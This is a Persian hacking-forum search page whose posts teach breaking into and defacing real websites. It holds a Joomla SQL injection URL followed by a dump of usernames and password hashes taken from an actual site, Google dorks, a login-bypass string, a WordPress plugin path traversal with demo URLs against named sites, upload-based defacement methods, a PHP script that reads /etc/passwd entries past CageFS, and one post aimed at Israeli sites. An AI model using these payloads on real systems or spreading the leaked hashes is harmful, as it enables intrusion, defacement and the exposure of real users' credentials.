جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'سایت هکینگ'.
21 نتیجه پیدا شد
-
بایپس پسورد وردپرس و نفوذ به سایت
DeMoN پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
سلام خدمت عزیزان گارد ایران. در این درس تصویری شمارو به نحوه بایپس پسورد cms وردپرس و نفوذ وهک کردن سایت آشنا میکنم.همونطور که میدونید تعداد تارگت های وردپرس بسیار زیاده و شما با این باگ و باگهایی که براتون خواهم گذاشت یکی از دیفیسر های خوب خواهید شد. امیدوارم لذت ببرین،در ضمن تشکر فراموش نشه. Pass:guardiran.org یا حق- 6 پاسخ
-
- آموزش هک سایت
- سایت هکینگ
- (و 6 مورد دیگر)
-
باسلام خدمت دوستان گل گارد ایران.این باگ بسیار تارگت های زیادی داره. ابتدا دورک کد PHP: inurl:option=com_tag بعدد این اکسپلوریت و ب اخر ادرس اضافه کن کد PHP: index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component بعد رمز ادمین و تمام کاربرای سایت و بهت میده که باید کرک کنی تا رمز اصلی بدستت بیاد همین اینو ادرس و ببینید حتما متوجه میشید. کد PHP: [Hidden Content],0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=componen t یوزر پسورد کد PHP: uhs16bh0ff1:03da8ebdc907de99ab136b910f2c176f:wzhsY2lsdOSY8qfoonzerfwSUgQog9oG:Registered,RuineeCenTuse:ce6d22250374561b8a44c413366463f1:AHxXlDDYnF3uKDyCZetZPWrlvTaTzHJP:Registered,ldx7v2o0y1s:2d4252f1a7b813b1953145d7fb6ace35:HCzd3NO2PdwsRWD7lT7ypS0C1NzOnW4k:Registered,notfl:a053c5bcb94965f6c2115f863af5410c:Vkni051ZsRRSFNNEryvRmImQQDa7agGy:Bloggers,notdpf:b73038b419b6e45637fd6d0661d1a78d:Ls71M34Md4LkcQi8kPSczgRK6pbLXi0G:Bloggers,notprs:e9ac4de97f82ccb5c7ba58297dee4599:GWmvksty6pRgzMQ23zDJ2p9W5P0omQhb:Bloggers,nottf:01cf6d9dd79781997b79c2e6116720ae:m7OijSh3Mg5Gsf6jFnfVueX8kZpJCdi4:Bloggers,maca:b0a16ffe8d18a8ff8c939cb6562f2d98:BGjwJonlCNxMrYn2diaxGmqvZchAZlPh:Manager,notcj:20859b839eab28d8ec20168aa91c0702:h8dp0PAhodBz6Rg7WiC8Xbjmd1HaIY8l:Bloggers,fernando:f12176debaacbc2c8df8801d9ce61762:RRbVK0vvaayMwCDbuwO3VprmqPae0R2K:Super Administrator,Poigma:dbe4ac9117a8bdfb33540e6cb436dbf0:wOfm0qdmU6Y39OFdRBbqEasnclVt72E5:Registered,passm:6d36a8415ba717c7997dc4b8c69813a6:7SXixpFIPRMiLgOApg9m00gSuP2XnhpJ:Bloggers,mcardarelli:60ffc723c55510fed14b837d24eb57d7:EVphmPbG8zxkVQJusIUsIpYwb0iIAYFd:Super Administrator,jmartinez:81f9b64bba3e7173ec55cb8867e05bd3:AwBgVA2Hlkcjtswl2Zqv1vlqWyEy5roc:Bloggers,rbattaglino:3dc4f70ee011b06a1e63018c287af296:jvW18dEeRv2J1XizwEAXRGBzdngZtvHx:Bloggers,cfantini:fe2e6059f00ee1751b17268255f784dc:UIL84SQhEFrkP1f5rLXMeiRK6BUtawOJ:Bloggers,drsabagh:a57833ccebd00963ae0fe31d36f420a5:m1fmT7QbGvcAcQsirwYOVzzJfcTFafO7:Bloggers,eldoceblog:dcec177b8c35a8d8cce5a2ad42aa1384:8JVNUQNJfdrcB0qOqw0D4eMKGHHzxIEw:Bloggers,nottgu:58b7dd1c0f74c3d197b8637894ed2df2:bBK7jG4LzWzodJPmCZagzx2KBm6WojZG:Bloggers,bpqlmhaic:83191c03563c2394645938dccf866747:RM5NJ6VPGTFJbqODxODbyeili6ZW1dR3:Registered,mcqdgyjm:7d56bbc315a6322bc49704c98a1b14f4:Pqjr9Wd3afmWOxUgQam8umbPkDQlfBFc:Registered,qdkrpermv:039c071f1b0389b1fa68b22951dee708:nctL730058fXlVuJOqOxJ6xOrIiJUDJO:Registered,jcqmfuqj:1b1a7479e0a25bd938a1fcfc4b8c779e:K2YRLMtXEJBdyyP44PV9LYA6PMhoYTup:Registered,itanuawlwar:7207f4dfc38c17f1e90c5c85a1a92ed5:Ky595rwJnMLae0nzrrYiEFE9QsyZOfWZ:Registered,Jagmaawarne:94a934b06647b51f8b43321ccce22150:8vFO15ew5GpFFyrUnGJbnI0p1PNaxVZu:Registered,Lindainlsq:b96cd3b9a388c83fb9c54ab4b15d726a:P8uA9S04OqCn3sG5jtT3SG0whHM2AFR9:Registered,pixrumnbcikiar :b3e4185ed84d8154f1d350871b3c7acf:GLaZfrSfXeIkP2Ta2EAWMGxbqkwV6p2o:Registered,oqlvucphuakm:82504aff74e84b1cdfed43ba6eebf7b2:FuQ1DqDFbbijDoW5e5mS4uTdoo9MZtk0:Registered,mcqpeixa:e75ae2fef2a8b0dbdb2b76758961695f:kAe3NWAVhzTrvUg3ULgvPj509ucXXi6w:Registered,Tattfuergylug:cd41dc24c50affc767c0ccb91e36c500:szVeVfcsPPBn5HKEf8APvyC5RomebNT5:Registered,lakeshabrentnal:35b80df934770ea43efa877ecd322f9a:tzmtF1WYapXM8YvbdX5eyV8lSafIqvxQ:Registered,cexexcaby:b16b93d74547bdefdea44e0b4b0a3a66:fsqchpGrgAozKtVF2vMbPf9Wy3tRngIC:Registered,ev7of0n1i1:b211faac87d1829741fefee24640652a:Wc7DMTWCEx6NcNHDpwapjtUp4hktvw64:Registered,lionlionov94:62083001cd4e55b8de21a9d78d41f542:99GGOv9EgADQRAb2v257VdtLdsLNvrfL:Registered,PRICYDRED:2c71d4ae3ba4aac3f787f5d4a6654b74:vRjQDJDWEr9Exa5En71KSt4EftwVlRKh:Registered,loyattgeovosy:5de3f749deeacfed85d660221f25be11:mPVYGS7rwLzYs09hytG22JxJaoW5TvbJ:Registered,Fruttphetle:9f4e50c585dcdd58f8e67874416dc111:wrZrGlX5GI92cz6jUdUoXbXUfnt781Oy:Registered,szybka pozyczka:f6ed603d45b2b52c59e674d109d2d3e7:ylf2R0phRdccKqgUBbaLGnfrrY7bqQ3e:Registered,sherellquist:30b1cbb5029de43b60797bdacace8164:MvoSekJecVvtQ5F3T8Z6fkfFCTLPGpYp:Registered,soccere:dde6d9dd364315492f314596a77724ba:2cxVAfK22a2SRDfpVYOymxWvP9SNRCUz:Registered,tavaClawn:fab72c1cd8e2f6d4a816efb8f53d8084:nRm1E92b9lRAA6p6qZF09yKa3e9kOiyW:Registered,RizBruttiGGer:f0067a8da323b2b79e5faf1a96e12594:ODbj1tSQf5ZvMHTsgq3mfS5DV9GVfcu9:Registered,Irrettekick:2e2ac70458c59caca91f07eae0e4cc8d:w5KdGDLS2P7tWyfJhYoCkle4sDwCvWX9:Registered,wthvqeqle:29128ad6089296febf13d4df716ad3eb:hgdcZZ211PWzi6BYpUXR6GyDUpRYMesW:Registered,roopsybribrak:94599d204adcd80947459fe3c47c29fb:C5GHSeJJzoAWi6OMojXxpabSuoHn3QuZ:Registered,scammajelve:985797b3d10e434fa3e896558960ed80:soymTef38ryeJKSgnQnd6JftGmuKbcUK:Registered,Erommurgitirl:f4feefaf8625907c8c760cf39149f071:RPuP1MbDerILuGAc25YSwsRLrerHLDVm:Registered,Sireworic:ced32b4b681c3db32c96d9278b8f306d:evGr2vJdyrO27ojwOF31p0Vi7vZljVs9:Registered,tdcasinoum:123bc1776494b621c959025395245077:iMQgfg6IESEMsj9DsAaZ7ypASugDtjmA:Registered,Stussyaddessy:bc5e4620accdf2d287c82b1361a47e04:0YaEux9NRHpQ7ubRCDL4jkk6xk5LgzqM:Registered,mxperhapsat:cca3a950e2d46e88e7141daa6c818c2c:9m2StFIKsKkeag7fUQKj3WSbqmZRZ5fB:Registered,DellBealm:c35c17817cff02cc13e45de270826c3c:k4XDteHCb1AYsslSSWbLqqp7RKAc17KS:Registered,Stoodsthoutty:e759edc4b5a035140a19c1001f3450b5:LLiQ4kmKBHrwbzrISFypxy3SU1kqcO7Q:Registered,pewproommern:ca2e27acfc744f88a31787313159852e:L0gSpUjA3FMjtQGJ2pNukDa1gdAsmu36:Registered,Raxybypeanync:c82b2bb6558e6e652b70095d5cf18202:ZgaWbUi4WF7PCsvMtLxWz50LKibyi2fZ:Registered,sueptpoonenry:47be956a2fc3c5dd60ce1dc30ba879a6:pvXWdr6fi89VFcxdznaNkKDtoJjDGQPb:Registered,itaxiaSog:712a83347cb16c221ef102a9d85ab46f:3Hh0ygxYObHrwi5sn22p28qPDqO19DGD:Registered,Pikavippi:6d0de3a90f9e7d2452e4c61a899c16ef:dBWvAFmFNu9xpZPrqndCahY9Pmhs2AOO:Registered,luettamartinat:fe981f239dba3f059715b2d13046305a:bU8MR7No7akWkCRHHxEBjw6f5jxpaoEU:Registered,jcqzfgft:9ea17a7177e19c3fa7c2d83f31894238:FdslMbY979JjHanmT3OTcuLTj8fXTghw:Registered,qpqteqscs:fa499ec1b9b258397af9631cca6a31dc:1BnsFcq8Y6WhwxfCxnnt9VofvaOKVXRj:Registered,ncqsyxeh:a8a32628e840cf951e80121fbc25078e:3I1ZZ0G2NIYmyD3O2jbfHHyLrbQvM0qL:Registered,qpqgsersx:7debb38ea2ad3857448a3320b7affb6c:h6SGQdo1DND0dgc14zQ5hXy8q4d915hA:Registered,rpqjvjyzt:d9cd1e36a3fb8e9cb88dc9edd9bd0d0e:ViilaMDfMPW8cLsfp8oPB0Nu4y8VRiop:Registered,gcqginfy:0828720db32f91f0ed4ca9a5adcfc475:Mtmi7NlDAaQUA0FVkI89dglGuETCUq0w:Registered,elcapo:2ec869e1846922ed5dec839121ef622c:OVEDZ47TFchmIGdZHcsci3LOU1rGfWIp:Registered,gjfqubgg:ca0d6223c9921d6eecb85a5a32d7e40b:ERfQ7bz9X9ebNnkwTKLlXG7DTaPihOap:Registered,wd5a72v4bza:5ff6706b26bea40d52290944166eb9a0:dsurrJ7wA4ztcoIniy3tWpVsQphvDmoN:Registered,Godieguille:075cf076bdd8e2398c06a884a5cd1614:qoROfyj1q9JAHjC206r6c5UbuUGA90Zu:Registered,ocqbzodp:63353152d1efbf1663b90e796e406173:cjusemacgDZJqHpee5bGi5EakKyAwx2I:Registered,ipqjenfmv:3ee4519c31ed4473c8a9ed0b16151835:lSQHpoHhxbhFM4LVUT2unl95rdwfpxRy:Registered,qcqmwjph:81199d1f8d2f1ecc1ef54ae3d31593bf:dwudXGnD1O0XAg6XHCUYT4TUdxDT2Liq:Registered,gjhyiwtf:72140203914c0e5bf827747e5a3a24a2:o1N1vxjD5r5Iwm0MmREbhOcBvAQ5xKrc:Registered,inhapyZiplild:29687540e875e5144333d41682aaca54:ZXlE5NCZep9ASFtusqs46zibXIy3rAhP:Registered,emizine:d82794818f9ad7eea16e158f239e8053:m1SECl144TzFxnKTlkcPmiEpBsmIGTVr:Registered,aluxibo:3fa245fd42b8a55d1008ae49d0bc6e1c:zPFWXZZo5uJdEEpxBRmb2vZxWUrsdjGC:Registered,epqtalllx:960804dc17ba16cffb1d42bcb85961e7:t3Gk4NPUp0nnYnqlUJD8UECJgQ10D1bq:Registered,npqbvfljq:252b27532e9519e9a5f6f1ce3d49db72:1hjvnP7cOEi1V40JvZVCKTzapEhDxKOC:Registered,spoubepiree:c17b9ec9fe751aa999e5a2d227cc4239:UgtZYFjeIdIKYsfssa73wnH2xQQQQgOP:Registered,kasabroot:8864f55f68bd3fc21145d98833968712:PBDVtoO2NYHkPSOkmcD89IFtOiYT3CEw:Registered,kalliefarber:5c7beef5f8aca13fa746b6d7bea19493:74Pbj6hzOoxJpy44pX9YdyBnS4jusXYt:Registered,noli:f6272d470853e135b8dc238a20a1ad7b:RW3DQHpLCTuMHKjhlpZ9upALO0x9ROCd:Registered,vr883q4ujpr:0ebe28552876d6c6dbe8342654305676:OFiyNyLJqvQQGiw18Uug4G387Ow9NINW:Registered,icqsidim:71984c95cefdf32fe76eba2154cb05fa:ow8NyXUlJHFR0G3HpNmgxa1WpPhz1kMA:Registered,gustavopupich:7e08c58be2aa89ef1e4415f6cbbecb65:YcIXvuVnfwCVg0vcpLBNTwsI3FFZgZV3:Registered,outradedo:7e7dccabdeac19ace6dccb4b8c3d9d9b:1DXFbn6uR64WsIwHF0soadVcmzozd2Np:Registered,smagAlamp:358ceea490c3a92cd88c380c3bb183bf:cdGbMGhOfiwmWDDohazMUSuZJt59GGXh:Registered,GoriePreofder:b1f5f48f3aa2447c9990418552476396:KcUi2uRAGF0f5cDgxGO27NskhWJ56W9C:Registered,luli:64de6e815fe854e066f8dd6d7dc6e3ae:F1BaBXLcHhaZfq9h9srbpcYMK9bddMIb:Registered,whiled4801:13a2e72d577a804e77726d6194a55ed4:Jgg5tu6gw6YY3MItj3zrVTGjaGEsddxJ:Registered,sdshbdogfdh:a9bf372d052b8de5ab200b2fe607c044:OQfWprpKWSsIiBJWKtqInzWc0N9FwvOv:Registered,cpqsyakev:da7b86994113c06a8d1f4f8a83d1ea6a:Tc32oj5MMHUUZ4mzajc0tjtyRd4VjxOa:Registered,lkxmqxgmil:461f0aa0c789cc70dfed69559123d51d:fzHUNLgaB2xjHnU3jF3qfG15Ssk0XJBn:Registered,neweffovamymn:1640b00682bd72526228588d45eda7be:nJuIY1onXk4QVaZgdUCUumVsAgGWhbah:Registered,ealjgxrtzef:6b04e286e96819f23605823894150f00:Sq7GNOxdr5AzkfsBWLGaVvGRnSAZssjO:Registered,elba_de_garcia:c39d29ffc83144e58b0552821952f2d5:ruhSLYStijHQiz2GO8qgidN5CDtYdlbY:Registered,wx1g6wps9t8:d2aec83d024470ace3e16c5f88f63710:evFQ3DpTqRsYxNvfIK0Sf9vX5vlCpOMu:Registered,Tisebroorie:ecd71d965ecc1d0b1c9c91e2e092b497:seEKGNXYaF5gsKDtUpLdlVBkYMf9GOfR:Registered,[email protected]<script cf-hash='f9e31' type="text/javascript"> /* */</script>:544d88f2c2d67d32667a06f6da2e501a:A5Iq69sygp6C24bl05UdZ49k95I0noQZ:Registered,eltsleyseri:1ed43577f3a4d8d497833800977feace:3gzMh3ArZ7bZ57kwKF5EjYzLbkAoRi1b:Registered,mary alb:0fcf90aa99048e95c1cf900436814e3d:IgHzZlzrFly8Y25kMA4kExEINpl4vnzy:Registered,rcpicco:0647715abe6719258b4bdf21d96a65c2:8BLd3oCM1aAxidFgsJJtIzH0NtW57Aib:Registered,kcqxueby:a72006b27a0d5311c46dcf5a883831e9:eEUyCHlm9Cp6elVkuBShDZ4IEF1l8BET:Registered,Ephellmef:1b383fabb25262065800656a1e3744b3:f05PPLn0tETKygHcfMdQtvT0DXg20qsE:Registered,overtip:73d0c5ec31a24c73584f0444b7522cb9:KEvwSYlywGw0CRKXRjAXZ5no5nES29nj:Registered,Evorodeeday:7401b8b07f83e0b807e28bb7d9ae07c5:LFGbWqpeL1jspMeT1MtIGKenhciB4u6K:Registered,MELMIRASOLES:a6ea7ccf6fe3ffe2d4adb5447e5b1e9b:ILu0iHrFzkIvZcqhvRZ2Yx6YtFPHfGJh:Registered,GPUENTE:ad71a90512ab00eb730421506fb86813:1SMpPdV4vAK32jy3mVREytergT2FJMzK:Registered,Pigreefug:690c92e5246b3277b6bdf061767caa2f:jClMZa8mLBTFajSCB9ZircIhbMv3E0Ke:Registered,luis alberto:b25b524a904afa77168e85c3df8b2d66:ZhMIhfqBGzDKYJtU5aRw4TUgkmrIqmGV:Registered,dpqrnximc:a880d8349504986c0e940b83be228278:puCLX3JPNG6q4aA32UqdT4HllTb0qyvO:Registered,fcaaesbts:7cf01b5d0124bb54ffae2d9ef40bb1dc:ylnbUfifttZHJ3yI7NUiYrpACa8t40HS:Registered,horasoro:83520878ba07cb1a2bd8f609ef3cb222:Plb1t63r5OrkEv9onFzloBcD0G3VThIU:Registered,DINOCBA:573822f069444966cd5d42eb00afe13f:RcMygvSejODnPSSxlhFui6qWsJnkisxl:Registered,mcambur:ff4a8cc39222bc8fe62ef71c3b58a0a9:1xMKeMDeprsToovex6xwUPwC4qEG8J6F:Registered,ttbbootpin کد PHP: uhs16bh0ff1:03da8ebdc907de99ab136b910f2c176f اولی یوزر هست بعد اون پسورد هک کردن سایت های ایرانی ممنوع بوده. یا حق
- 3 پاسخ
-
- هک سایت های جوملا
- سایت هکینگ
-
(و 6 مورد دیگر)
برچسب زده شده با :
-
آپلود شل در جوملا و دیفیس سایت
DeMoN پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
سلام خدمت عزیزان گارد ایران،در خدمت شما هستیم با آموزش آپلود شل و دیفیس سایت جوملا. نام کامل باگ:JCE Joomla Extension Remote File Upload Pass:guardiran.org [Hidden Content] فقط عذرخواهم که تو انجمن آپ نشد چون هرکار کردم نتونستم آپ کنمش،به هر مقدار بهشی که تقسیم کردم نشد. ارور internet server error میداد. فردا در انجمن آپ میکنم. اسکریپت مورد استفاده در آموزش پیوست شد. Pass:guardiran.org یاحق Jomla-Script.zip- 3 پاسخ
-
- دیفیس سایت جوملا
- آموزش نفوذ به سایت جوملا
- (و 8 مورد دیگر)
-
آموزش هک سایت و آپلود شل در جوملا
DeMoN پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
سلام خدمت دوستان عزیز گارد ایران. خوب دوستان اینم یک آموزش مفید و بسیار کاربردی برای دوستان. pass:guardiran.org برای استفاده از آموزش ابتدا تمامی فایل ها رو دانلود و در یک پوشه اکسترکت نمایید. یا حق Jomla Shell Upload Full Privet 8.part1.rar Jomla Shell Upload Full Privet 8.part2.rar- 4 پاسخ
-
- آموزش هک سایت جوملا
- هک سایت با باگ جوملا
-
(و 4 مورد دیگر)
برچسب زده شده با :
-
به نام برنامه نویس هستی سلامی دوباره به اعضای انجمن گارد ایران . امروز معروف ترین باگ بین هکرها رو برای شما آوردم این باگ برای استخراج اطلاعات سایت از جمله یوزر و پسورد سایت هست . البته این باگ رو من توی دو بخش متوسط و حرفه ای براتون میزارم چون بعضی ها روش دستیش شاید براشون سخت باشه . =============================================================================================================== Bug name : SQL وضعیت : پچ نشده تعداد سایت های دارای این باگ در گوگل : بی شمار دورک ها : بی شمار ( دورک های زیادی برای سایت های عربی و.... وجود داره ) =============================================================================================================== آموزش هکرها : ابتدا دورک زیر رو توی گوگل سرچ کنید . سپس یکی از سایتها رو باز کنید و این علامت رو جلوش بزارید ' این علامت برای اینه که بفهمیم سایت باگ sql داره یا نه دورک : inurl : index.php?id=1 ( برای پیدا کردن سایت های بیشتر این باگ اون 1 رو به عدد های دیگه تبدیل کنید ) خب وقتی علامت رو اضافه کردید اگر سایت دوباره بدون هیچ مشکلی لود شد یعنی سایت باگ نداره اما اگر با چنین اروری مواجه شدید یعنی سایت باگ داره : err fetch static page>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 1' at line 1 خب تا الان فهمیدیم سایت باگ داره حالا نحوه هکش رو به صورت یه فیلم ازسیستم خودم واستون آماده کردم : لینک فیلم آموزشی : [Hidden Content] فیلم واضح و گویاس . در آخر تشکر یادتون نره . لینک دانلود نرم افزاری که در فیلم استفاده شده اسمش نرم افزار hAVIJ هستش: [Hidden Content] قسمت بعدی این باگ روش هک به صورت دستی باگ SQL
-
- SQL INJECTION
- آموزش هک سایت
- (و 6 مورد دیگر)
-
به نام برنامه نویس هستی سلامی دوباره به اعضای انجمن گارد ایران امروز یه باگ برای دیفیسرا آوردم که عاشقش میشن . این باگ فقط مخصوص دیفیسرا هستش و هیچ کاربردی برای هکرها نداره . این باگ نه نیازی به طزریق اکسپلوت داره نه Bypass این باگ در عرض 5 ثانیه دیفیس شما رو با فرمت html و یا حتی شل شما رو با فرمت html آپلود میکنه ( البته آپلود شل یکمی سخته ) به هر حال محبوب ترین باگ برای دیفیسرا هستش . =============================================================================================================== Bug name : Kindeditor وضعیت : پچ نشده تعداد سایت های دارای این باگ در گوگل : About 324 results برای : مس دیفیس و دیفیس کامل ============================================================================================================= آموزش دیفیسرا : ابتدا دورک زیر رو توی گوگل سرچ کنید و یکی از تارگنت های هدف رو انتخاب کنید بعدش کلید Upload رو بزنید و دیفیس خودتونو آپلود کنید . بعدش آدرس داده شده رو جلوی آدرس سایت کپی پیست کنید و تماااااام برید ثبتش کنید دورک :inurl:kindeditor/examples/uploadbutton.html ( نیازی به اکسپلوت نیست خود دورک کار اکسپلوت رو میکنه ) ============================================================================================================= ( قابل ثبت در zone و zone-h ) ( شل هم آپلود میشه البته باید Bypass کنید ) در آخر تشکر یادتون نره یاعلی
-
- Kindeditor
- آموزش باگ Kindeditor
- (و 7 مورد دیگر)
-
MAXSITE 1.10 Authorization Bypass Vulnerability
DeMoN پاسخی ارسال کرد برای یک موضوع در اکسپلویت های لینوکس
درود. ابتدا گوگل دورک: intext:"Powered by MAXSITE 1.10" پنل ادمین: /index.php?name=admin Type in: ' OR '1'='1' -- For both username and password and then login. (Don't forget to add space after --) Demo: Demo: [Hidden Content] [Hidden Content] [Hidden Content]-
- اکسپلویت هک سایت
- هک سایت با اکسپلویت
- (و 4 مورد دیگر)
-
####################################################################### # # Exploit Title: Cms Made Simple multi vulnerability 1.11.10 # Date: 2014 12 June # Author: Dr.3v1l # Vendor Homepage: [Hidden Content] # Version : 1.11.10 # Tested on: Windows # Category: webapps # Google Dork: intext:"powered by CMS Made Simple" # ####################################################################### # # [+] Exploit : # # Cross site scripting (xss) : # # POST input <default_cms_lang> was set to <fa_IR" onmouseover=prompt(3v1l) bad="> # [Hidden Content] # [Hidden Content] # # Host header attack : # # [Hidden Content] # # PoC : cmsmadesimple\admin\themes\NCleanGrey\login.php # # . # . # . # # <p id="img"><?php echo lang('login_info')?>:</p> # <?php echo lang('login_info_params')?> # # // #vulnerability is here # <span>( <?php echo $_SERVER['HTTP_HOST'];?> )</span> # // --end # # </div> # </div> # <div class="login"> # . # . # . # . # # -------------------------- # # /cmsmadesimple/index.php # ####################################################################### # # [+] Contact Me : # # B.Devils.B@gmail.com # Twitter.com/Doctor_3v1l # IR.linkedin.com/in/hossein3v1l # [Hidden Content] # [Hidden Content] # [Hidden Content] # [Hidden Content] # Hossein Hezami - Black_Devils B0ys # ####################################################################### # B.Devils.B Friends , R.H.H (UnderGround) , IeDB.IR , Emperor Team # specially of brother Medrik for keep me again researching .. ####################################################################### سلام خدمت دوستان عزیز گارد ایران. خوب در این تاپیک براتون تمامی اکسپلویت های سرور های لینوکس رو قرار میدم و امیدوارم لذت ببرین. یا حق
- 13 پاسخ
-
- هک سایت با اکسپلویت
- سایت هکینگ
- (و 6 مورد دیگر)
-
درود بر تمامی عزیزان گارد ایران. در این تاپیک اکسپلویت های مختلف قرار میگیرند. اکسپلویت هایی از قبیل آپلود شل و دیفیس در CMS های مختلف. قوانین تاپیک: 1-اسپم ممنوع 2-طرح سوال در بخش مربوطه. 3-چیزی به جز اکسپلویت در این تاپیک قرار نخواهد گرفت. موفق باشید. ############################################################################################ Wordpress Plugin Slider Revolution 4.1.4 سلام از طریق باگ پلاگین Slider Revolution می توان فایل config.php را دانلود و اطلاعات DataBase را مشاهده کرد. DORK: revslider.php "index of" POC [Hidden Content] DEMO www.redkatana.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php www.gaeliccollege.edu/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
- 6 پاسخ
-
- آپلود شل و دیفیس سایت
- آموزش آپلود شل در وردپرس
- (و 6 مورد دیگر)
-
آموزش متد J.Bird SQL Injection در دیتابیس هکینگ
DeMoN پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی
به نام خدا سلام خدمت دوستان عزیز گارد ایران. در این تاپیک قصد تشریح باگ J.Bird SQL Injection رو دارم ما از این متد در اینجکت دیتابیس استفاده میکنیم. ============================================================= خوب دوستان از همین جا تاپیک رو شروع میکنم. خوب برای اینکه بدون تست تشخیص بدید که نیاز هست از این متد در دیتابیس هکینگ استفاده کنیم یا نه باید ارور هارو مورد بررسی قرار بدید. ارور های این دیتا بیس مانند Fire هست. برخی از این ارورها عبارت اند از: warning: + php یه تابع (function): ibase_query() ibase_fetch_row() ibase_fetch_object() ibase_fetch_assoc() ibase_free_result() برای مثال تارگت زیر: [Hidden Content] اروری که مشاهده میکنیم: Warning: ibase_query(): Dynamic SQL Error SQL error code خوب دوستان این مقدمه ای بر این متد بود. این متد رو در پست های بعدی عملی خواهیم داشت. یا حق- 1 پاسخ
-
- J.Bird SQL Injection
- دیتابیس هکینگ
- (و 6 مورد دیگر)
-
سلام خدمت تمامی عزیزان یتم. در این آموزش تصویری خدمت شما هستیم با آموزش باگ PRIV8 CSR باگی ساده و با تارگت های بالا خدمت شما عزیزان. امیدوارم لذت ببرین. تشکر فراموش نشه. یا حق Recordings.part1.rar Recordings.part2.rar
-
- هک سایت
- سایت هکینگ
-
(و 7 مورد دیگر)
برچسب زده شده با :
-
<?php #Priv8 CageFS BYPASS #By Br0keN #/etc/passwd <center> <html dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Priv8 CageFS Bypass</title> <style type="text/css" media="screen"> body { font-size: 10px; font-family: verdana; } INPUT { BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #D50428; BACKGROUND: #590009; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #D50428; COLOR: #ffffff; BORDER-TOP-COLOR: #D50428; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #D50428 } </style> </head> <body dir="ltr" alink="#D50428" bgcolor="#ffffff" link="#00c000" text="#D50428" vlink="#000000"> <p align="center" dir="rtl"><font color="#D50428"><span lang="ar-sa"><font size=5><b>Priv8 CageFS Bypass<br></font> <p align="center" dir="rtl"><font color="#D50428"><span lang="ar-sa"><font size=2> EHC TeaM By Br0keN <br><br> <p align="center" dir="rtl"><font color="#D50428"><span lang="ar-sa"><font size=2>Web:vb.ehcommunity.com<br><br><br> etc/passwd/</b></font><br> <?php error_reporting(E_ALL ^ E_NOTICE); if (function_exists('posix_getpwuid')) { if (isset($_POST['Br']) && isset($_POST['x0'])) { $Br = intval($_POST['Br']); $x0 = intval($_POST['x0']); while ($Br < $x0) { $uid = posix_getpwuid($Br); if ($uid) { $uid["dir"] = "<a href=\"\">".$uid["dir"]."</a>"; echo join(":",$uid)."<br>"; } $Br++; } } else { echo ' <form method="POST" action="?br0=x0">Uid FROM : <input type="text" name="Br" value="1" size="4"> TO : <input type="text" name="x0" value="1000" size="4"> <input type="submit" name="Show" value="Show">'; } } else die("Error..! Posix Functions are disabled..!!!"); die(); ?>
-
<?php // HotBot project for Dorking // Coded in Morocco 27/11/2014 at 19:18 in my room xD // Greetz to all codersleet members and my friends // dont change the rights // [Hidden Content] //[Hidden Content] print " +-----------------------------+ | HotBot Dorking | | coded by Mr.MaGnoM | | CodersLeet Team | +-----------------------------+ "; echo "\n"; $ch1 =curl_init("[Hidden Content]"); curl_setopt($ch1, CURLOPT_RETURNTRANSFER, 1); $keyvoll = curl_exec($ch1); curl_close($ch1); $ma=preg_match("/\.val\('(.*?)'\);/",$keyvoll,$ke); //echo $ke[1]."\n"; //$dork=urlencode($argv[1]); // [Hidden Content]search/web?pn=$i&q=$dork&keyvol=$ke[1] $ch=curl_init(); for($i=1;$i<=30;$i++){ curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_URL,"[Hidden Content]search/web?pn=$i&q=*ur dork here*&keyvol=$ke[1]"); // here ur dork encoded use this site for encode ur dork [Hidden Content] curl_setopt($ch,CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch,CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch,CURLOPT_USERAGENT,'msnbot/1.0 (+[Hidden Content])'); curl_setopt($ch,CURLOPT_ENCODING,"gzip, deflate, compress"); $data=curl_exec($ch); preg_match_all('#<span class="web-baseuri">(.*?)</span>#',$data,$matches); $links=array_unique($matches[1]); //print_r($matches[1]); $op=@fopen('result.html','a+'); foreach ($links as $ul){ echo "[Hidden Content]"; fwrite($op,"[Hidden Content];"); } fclose($op); //if(!preg_match('#NO RESULTS FOUND#i',$data)) break; } ?>
-
- Auto Dorker
- اتو دورکر
-
(و 2 مورد دیگر)
برچسب زده شده با :
-
آموزش آپلود دیفیس در جوملا(priv8)
DeMoN پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
سلام خدمت دوستان عزیز گارد ایران. در این تاپیک میخوام یک باگ پرایوت رو پابلیک کنم. در این ویدیو شما یاد خواهید گرفت که چگونه صفحه دیفیس خودتون رو در سایت جوملا آپ کنید و در زون به ثبت برسونیدش. سایت های هک شده pass:guardiran.org برای استفاده از آموزش ابتدا همه ی پارتهارو دانلود کرده سپس در یک پوشه اکسترکت نمایید. یا حق Bandicam.part1.rar Bandicam.part2.rar Bandicam.part3.rar Bandicam.part4.rar Bandicam.part5.rar-
- هک سایت
- سایت هکینگ
- (و 6 مورد دیگر)
-
سلام خدمت عزیزان گارد ایران.خوب دوستان,من در این تاپییک قصد دارم که به همراه شما باگهای سایت های اسراییلی رو بررسی کنم. امیدوارم از آموزش ها نهایت و بهره و ببرین. به امید روزی که صهیونیست و استکبار و ظالم از صفحه روزگار محو شوند. یا حق
- 7 پاسخ
-
